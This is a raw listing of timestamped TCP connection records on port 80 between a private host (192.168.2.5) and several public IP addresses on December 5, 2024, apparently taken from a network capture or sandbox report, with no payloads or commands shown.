Dec 5, 2024 14:25:14.602047920 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.602060080 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.602102041 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
Dec 5, 2024 14:25:14.602102995 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.602118015 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.602158070 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
Dec 5, 2024 14:25:14.602406025 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.602418900 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.602456093 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
Dec 5, 2024 14:25:14.616441011 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
Dec 5, 2024 14:25:14.721729040 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.721847057 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.721885920 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
                                                                                Dec 5, 2024 14:25:14.721913099 CET4971380192.168.2.5103.235.47.188
                                                                                Dec 5, 2024 14:25:15.654213905 CET8049715119.28.131.242192.168.2.5
                                                                                Dec 5, 2024 14:25:15.654232979 CET8049715119.28.131.242192.168.2.5
                                                                                Dec 5, 2024 14:25:15.654323101 CET4971580192.168.2.5119.28.131.242
                                                                                Dec 5, 2024 14:25:15.667171955 CET4971580192.168.2.5119.28.131.242
                                                                                Dec 5, 2024 14:25:15.787128925 CET8049715119.28.131.242192.168.2.5
                                                                                Dec 5, 2024 14:25:16.212343931 CET804971727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:16.217107058 CET4971780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:16.217387915 CET4971980192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:16.337080956 CET804971927.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:16.337163925 CET4971980192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:16.337491035 CET4971980192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:16.457321882 CET804971927.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:16.671552896 CET8049715119.28.131.242192.168.2.5
                                                                                Dec 5, 2024 14:25:16.671659946 CET4971580192.168.2.5119.28.131.242
                                                                                Dec 5, 2024 14:25:18.095194101 CET804971927.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:18.104638100 CET4971980192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:18.115359068 CET4972180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:18.115847111 CET4972280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:18.116866112 CET4972380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:18.235318899 CET8049721182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:18.235384941 CET4972180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:18.235531092 CET8049722114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:18.235582113 CET4972280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:18.236612082 CET8049723119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:18.236658096 CET4972380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:18.400424004 CET4972180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:18.400489092 CET4972280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:18.400599957 CET4972380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:18.522519112 CET8049721182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:18.522531033 CET8049722114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:18.522540092 CET8049723119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:19.205837965 CET804971627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:19.210308075 CET4971680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:19.210551023 CET4972580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:19.330322981 CET804972527.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:19.330399990 CET4972580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:19.330724001 CET4972580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:19.450397015 CET804972527.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:19.638938904 CET8049723119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:19.638998032 CET4972380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:19.639070034 CET8049723119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:19.639130116 CET4972380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:19.639173985 CET4972380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:19.647104025 CET4972680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:19.759088039 CET8049723119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:19.766918898 CET804972627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:19.767019033 CET4972680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:19.767446041 CET4972680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:19.887162924 CET804972627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:20.254897118 CET8049721182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:20.255034924 CET4972180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:20.255034924 CET4972180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:20.255044937 CET8049721182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:20.255168915 CET4972180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:20.374908924 CET8049721182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:21.160648108 CET804972527.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:21.207016945 CET4972580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:21.252211094 CET4972580192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:21.305829048 CET4972980192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:21.344404936 CET4973080192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:21.425697088 CET804972927.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:21.425892115 CET4972980192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:21.436161041 CET4972980192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:21.464664936 CET8049730114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:21.464734077 CET4973080192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:21.468045950 CET4973080192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:21.555491924 CET804972627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:21.556060076 CET804972927.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:21.561606884 CET4972680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:21.561866045 CET4973180192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:21.587826014 CET8049730114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:21.682737112 CET804973127.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:21.682812929 CET4973180192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:21.683207035 CET4973180192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:21.803070068 CET804973127.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:23.254631996 CET804972927.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:25:23.261002064 CET4972980192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:25:23.261251926 CET4973980192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:23.381129980 CET804973927.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:23.381613970 CET4973980192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:23.381920099 CET4973980192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:23.479823112 CET804973127.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:23.483684063 CET4973180192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:23.501584053 CET804973927.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:25.138626099 CET804973927.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:25:25.142267942 CET4973980192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:25:28.558636904 CET4975280192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:28.558639050 CET4975180192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:28.682028055 CET8049751123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:28.682102919 CET8049752123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:28.682138920 CET4975180192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:28.682173014 CET4975280192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:28.682466030 CET4975180192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:28.682508945 CET4975280192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:28.803352118 CET8049751123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:28.803365946 CET8049752123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:30.257421970 CET8049752123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:30.262482882 CET4975280192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:30.263978004 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:30.264058113 CET4975980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:30.289377928 CET8049751123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:25:30.294259071 CET4975180192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:25:30.295603991 CET4976080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:30.295660019 CET4976180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:30.383809090 CET8049758119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:30.383891106 CET8049759182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:30.383929968 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:30.383963108 CET4975980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:30.384088039 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:30.384202003 CET4975980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:30.415365934 CET8049760119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:30.415397882 CET8049761182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:30.415498018 CET4976180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:30.415502071 CET4976080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:30.415700912 CET4976180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:30.417613029 CET4976080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:30.503911972 CET8049758119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:30.503926039 CET8049759182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:30.535715103 CET8049761182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:30.537270069 CET8049760119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:31.983479023 CET8049759182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:31.983542919 CET4975980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:31.983561039 CET8049759182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:31.983603001 CET4975980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:31.983701944 CET4975980192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:31.984484911 CET8049761182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:31.984551907 CET4976180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:31.984661102 CET4976180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:31.984700918 CET8049761182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:31.985003948 CET4976180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:25:31.992237091 CET4976780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.006140947 CET4976880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.084537029 CET8049760119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.084553957 CET8049760119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.084641933 CET4976080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.084763050 CET4976080192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.089039087 CET8049758119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.089092970 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.089162111 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.089169979 CET8049758119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.089232922 CET4975880192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:25:32.103856087 CET8049759182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:32.104482889 CET8049761182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:25:32.112166882 CET8049767183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:32.112251997 CET4976780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.112603903 CET4976780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.125863075 CET8049768183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:32.126070023 CET4976880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.126265049 CET4976880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:32.204452991 CET8049760119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.210272074 CET8049758119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:25:32.232376099 CET8049767183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:32.247606993 CET8049768183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:33.685031891 CET8049768183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:33.685414076 CET8049767183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:33.692904949 CET4976780192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:33.693546057 CET4976880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:40.148854971 CET8049722114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:40.148937941 CET4972280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.161995888 CET4972280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.163383007 CET4978480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.282011986 CET8049722114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:40.283139944 CET8049784114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:40.283250093 CET4978480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.284688950 CET4978480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:40.404516935 CET8049784114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:43.005281925 CET4979080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.005301952 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.126002073 CET8049790183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:43.126015902 CET8049791183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:43.126240969 CET4979080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.126562119 CET4979080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.126564026 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.127466917 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:43.250005007 CET8049790183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:43.250885963 CET8049791183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:43.383518934 CET8049730114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:43.383579969 CET4973080192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.383656979 CET4973080192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.385215044 CET4979280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.503386974 CET8049730114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:43.504935026 CET8049792114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:43.505045891 CET4979280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.505218983 CET4979280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:25:43.625711918 CET8049792114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:25:44.677705050 CET8049791183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:44.691282034 CET8049790183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:25:44.722615004 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:44.735698938 CET4979080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:25:44.751296043 CET4979180192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:38.151088953 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:38.151858091 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:38.270031929 CET8049942114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:38.270097971 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:38.270463943 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:38.270793915 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:38.270843983 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:38.270967007 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:38.271611929 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:38.271655083 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:38.271783113 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:38.390413046 CET8049942114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:38.391072035 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:38.391781092 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:39.492655039 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:39.492705107 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:39.492886066 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:39.492958069 CET4994480192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:39.513715029 CET4994880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:39.614227057 CET8049944119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:39.634681940 CET804994849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:39.637914896 CET4994880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:39.638016939 CET4994880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:39.758879900 CET804994849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:39.844280005 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:39.844408989 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:39.844430923 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:39.844540119 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:39.844589949 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:39.964272022 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:41.209420919 CET804994849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:41.214967966 CET4994880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:41.217799902 CET4995080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:41.337526083 CET804995027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:41.337613106 CET4995080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:41.337794065 CET4995080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:41.458461046 CET804995027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:43.119719982 CET804995027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:43.127244949 CET4995080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:43.127712965 CET4995680192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:43.248029947 CET804995627.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:43.251792908 CET4995680192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:43.251868963 CET4995680192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:43.371603012 CET804995627.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:45.080378056 CET804995627.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:45.105900049 CET4995680192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:45.165364981 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:45.166935921 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:45.285181046 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:45.285599947 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:45.286613941 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:45.286691904 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:45.287086010 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:45.287271976 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:45.406768084 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:45.407062054 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:46.521205902 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:46.521255016 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:46.521378994 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:46.521383047 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:46.521434069 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:46.526987076 CET4996780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:46.641205072 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:46.646837950 CET804996727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:46.646922112 CET4996780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:46.647070885 CET4996780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:46.766738892 CET804996727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:46.864692926 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:46.864753008 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:46.864816904 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:46.864918947 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:46.864964008 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:46.984666109 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:48.421031952 CET804996727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:48.427262068 CET4996780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:48.427552938 CET4997380192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:48.547277927 CET804997327.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:48.547344923 CET4997380192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:48.547483921 CET4997380192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:48.667512894 CET804997327.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:50.305517912 CET804997327.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:50.314167023 CET4997380192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:50.811131001 CET4997980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:50.930938005 CET8049979123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:50.937768936 CET4997980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:50.957849979 CET4997980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:51.077655077 CET8049979123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:52.510710001 CET8049979123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:52.515347958 CET4997980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:52.520142078 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:52.521245956 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:52.639955044 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:52.640032053 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:52.640202045 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:52.640942097 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:52.641005993 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:52.641159058 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:52.762250900 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:52.763356924 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:53.025316954 CET8049922114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:53.027832985 CET4992280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.027899027 CET4992280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.031737089 CET4998780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.147667885 CET8049922114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:53.151535034 CET8049987114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:53.151808023 CET4998780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.152030945 CET4998780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.271821022 CET8049987114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:54.369816065 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:54.369878054 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:54.369904041 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:54.369951010 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:54.369976997 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:54.374357939 CET4998980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:54.489751101 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:54.494168997 CET8049989183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:54.494239092 CET4998980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:54.494318962 CET4998980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:54.614058971 CET8049989183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:55.637254000 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:55.637401104 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:55.637475014 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:55.637550116 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:55.757316113 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:56.056746006 CET8049989183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:56.061630011 CET4998980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:56.474791050 CET4999580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:56.594546080 CET8049995183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:56.594604015 CET4999580192.168.2.5183.60.95.221
